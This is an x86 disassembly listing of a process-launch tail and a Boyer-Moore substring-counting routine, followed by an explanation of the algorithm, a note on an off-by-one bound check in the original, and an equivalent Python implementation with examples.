00348005 C745 AC 44000000 MOV DWORD PTR SS:[EBP-54],44

0034800C 33D2 XOR EDX,EDX

0034800E 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00348011 50 PUSH EAX

00348012 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]

00348015 50 PUSH EAX

00348016 52 PUSH EDX

00348017 52 PUSH EDX

00348018 52 PUSH EDX

00348019 52 PUSH EDX

0034801A 52 PUSH EDX

0034801B 52 PUSH EDX

0034801C FF75 08 PUSH DWORD PTR SS:[EBP+8]

0034801F 52 PUSH EDX

00348020 E8 1D010000 CALL 00348142 ; JMP to kernel32.CreateProcessA

00348025 8BF8 MOV EDI,EAX

00348027 FF75 F0 PUSH DWORD PTR SS:[EBP-10]

0034802A E8 EF000000 CALL 0034811E ; JMP to kernel32.CloseHandle

0034802F FF75 F4 PUSH DWORD PTR SS:[EBP-C]

00348032 E8 E7000000 CALL 0034811E ; JMP to kernel32.CloseHandle

00348037 8BF8 MOV EDI,EAX

00348039 5B POP EBX

0034803A 5E POP ESI

0034803B 5F POP EDI

0034803C C9 LEAVE

0034803D C2 0400 RETN 4

00348040 55 PUSH EBP

00348041 8BEC MOV EBP,ESP

00348043 81C4 F8FBFFFF ADD ESP,-408

00348049 53 PUSH EBX

0034804A 56 PUSH ESI

0034804B 57 PUSH EDI

0034804C C785 F8FBFFFF 00>MOV DWORD PTR SS:[EBP-408],0

00348056 8B5D 18 MOV EBX,DWORD PTR SS:[EBP+18]

00348059 83FB 01 CMP EBX,1

0034805C 7F 0A JG SHORT 00348068

0034805E B8 FEFFFFFF MOV EAX,-2

00348063 E9 A2000000 JMP 0034810A

00348068 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]

0034806B 0375 10 ADD ESI,DWORD PTR SS:[EBP+10]

0034806E 2BF3 SUB ESI,EBX

00348070 8BD6 MOV EDX,ESI

00348072 B9 00010000 MOV ECX,100

00348077 8BC3 MOV EAX,EBX

00348079 8DBD FCFBFFFF LEA EDI,DWORD PTR SS:[EBP-404]

0034807F F3:AB REP STOS DWORD PTR ES:[EDI]

00348081 8BCB MOV ECX,EBX

00348083 49 DEC ECX

00348084 8B75 14 MOV ESI,DWORD PTR SS:[EBP+14]

00348087 8DBD FCFBFFFF LEA EDI,DWORD PTR SS:[EBP-404]

0034808D 33C0 XOR EAX,EAX

0034808F 8A06 MOV AL,BYTE PTR DS:[ESI]

00348091 46 INC ESI

00348092 890C87 MOV DWORD PTR DS:[EDI+EAX*4],ECX

00348095 49 DEC ECX

00348096 ^75 F7 JNZ SHORT 0034808F

00348098 8BCB MOV ECX,EBX

0034809A 49 DEC ECX

0034809B 894D FC MOV DWORD PTR SS:[EBP-4],ECX

0034809E 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C]

003480A1 8B7D 14 MOV EDI,DWORD PTR SS:[EBP+14]

003480A4 0375 08 ADD ESI,DWORD PTR SS:[EBP+8]

003480A7 EB 15 JMP SHORT 003480BE

003480A9 03C1 ADD EAX,ECX

003480AB 2B45 FC SUB EAX,DWORD PTR SS:[EBP-4]

003480AE 79 05 JNS SHORT 003480B5

003480B0 B8 01000000 MOV EAX,1

003480B5 03F0 ADD ESI,EAX

003480B7 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]

003480BA 3BD6 CMP EDX,ESI

003480BC 7C 46 JL SHORT 00348104

003480BE 33C0 XOR EAX,EAX

003480C0 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]

003480C3 3A0439 CMP AL,BYTE PTR DS:[ECX+EDI]

003480C6 74 11 JE SHORT 003480D9

003480C8 8B8485 FCFBFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-404]

003480CF 3BD8 CMP EBX,EAX

003480D1 ^75 E2 JNZ SHORT 003480B5

003480D3 8D7431 01 LEA ESI,DWORD PTR DS:[ECX+ESI+1]

003480D7 ^EB E1 JMP SHORT 003480BA

003480D9 49 DEC ECX

003480DA 33C0 XOR EAX,EAX

003480DC 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]

003480DF 3A0439 CMP AL,BYTE PTR DS:[ECX+EDI]

003480E2 75 0F JNZ SHORT 003480F3

003480E4 49 DEC ECX

003480E5 ^79 F5 JNS SHORT 003480DC

003480E7 FF85 F8FBFFFF INC DWORD PTR SS:[EBP-408]

003480ED 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]

003480F0 46 INC ESI

003480F1 ^EB CB JMP SHORT 003480BE

003480F3 8B8485 FCFBFFFF MOV EAX,DWORD PTR SS:[EBP+EAX*4-404]

003480FA 3BD8 CMP EBX,EAX

003480FC ^75 AB JNZ SHORT 003480A9

003480FE 8D7431 01 LEA ESI,DWORD PTR DS:[ECX+ESI+1]

00348102 ^EB B6 JMP SHORT 003480BA

00348104 8B85 F8FBFFFF MOV EAX,DWORD PTR SS:[EBP-408]

0034810A 5F POP EDI

0034810B 5E POP ESI

0034810C 5B POP EBX

0034810D C9 LEAVE

0034810E C2 1400 RETN 14

00348111 CC INT3
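The last routine in the listing (00348040 onwards) fills a 256-entry dword table with the pattern length (EBX), overwrites the entry of every pattern byte but the last with its distance from the end, and then scans a buffer comparing from the last pattern byte backwards, bumping the counter at [EBP-408] on each full match and shifting by the table value on a mismatch. That is the bad-character rule of Boyer-Moore used as an occurrence counter. Below is my Python reading of it, added here as an example and not code from the page; the argument roles (start offset, buffer, end offset, pattern, pattern length) and the overlapping-count semantics are inferred from the listing and should be treated as assumptions.

```python
def count_substring(buf, start, end, pattern):
    """Count occurrences of `pattern` in buf[start:end], overlapping ones
    included, with the bad-character rule of Boyer-Moore. This mirrors my
    reading (an assumption) of the routine at 00348040: a pattern shorter
    than two bytes makes it return -2, and the scan window never starts
    past end - len(pattern)."""
    m = len(pattern)
    if m <= 1:
        return -2                        # CMP EBX,1 / JG ... MOV EAX,-2
    # Shift table: m for bytes absent from the pattern, otherwise (m-1) minus
    # the rightmost index of the byte within pattern[:-1] (the fill loop at
    # 0034808F writes decreasing ECX values over the default).
    table = [m] * 256
    for i in range(m - 1):
        table[pattern[i]] = m - 1 - i
    limit = end - m                      # EDX: last permitted window start
    pos = start                          # ESI: current window start
    count = 0                            # [EBP-408]
    while pos <= limit:                  # CMP EDX,ESI / JL -> done
        j = m - 1                        # compare from the last pattern byte
        while j >= 0 and buf[pos + j] == pattern[j]:
            j -= 1
        if j < 0:
            count += 1
            pos += 1                     # the routine just INCs ESI after a match
            continue
        c = buf[pos + j]                 # mismatching text byte
        if table[c] == m:
            pos += j + 1                 # byte absent from pattern: skip past it
        else:
            # shift = j - rightmost(c); negative values become 1 (JNS branch).
            # It cannot be 0, because pattern[j] != c by construction.
            shift = table[c] + j - (m - 1)
            pos += shift if shift > 0 else 1
    return count


if __name__ == "__main__":
    print(count_substring(b"abcabcab", 0, 8, b"abc"))   # 2
    print(count_substring(b"aaaa", 0, 4, b"aa"))        # 3 (overlaps count)
```

One detail of the listing that the rewrite deliberately does not reproduce: the match path (003480E7 to 003480F1) jumps back to 003480BE, past the CMP EDX,ESI at 003480BA, so after a match in the last window the routine compares one window beyond the limit before the bound check runs again. The Python loop tests the bound on every window, which is the behaviour a clean implementation should have.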
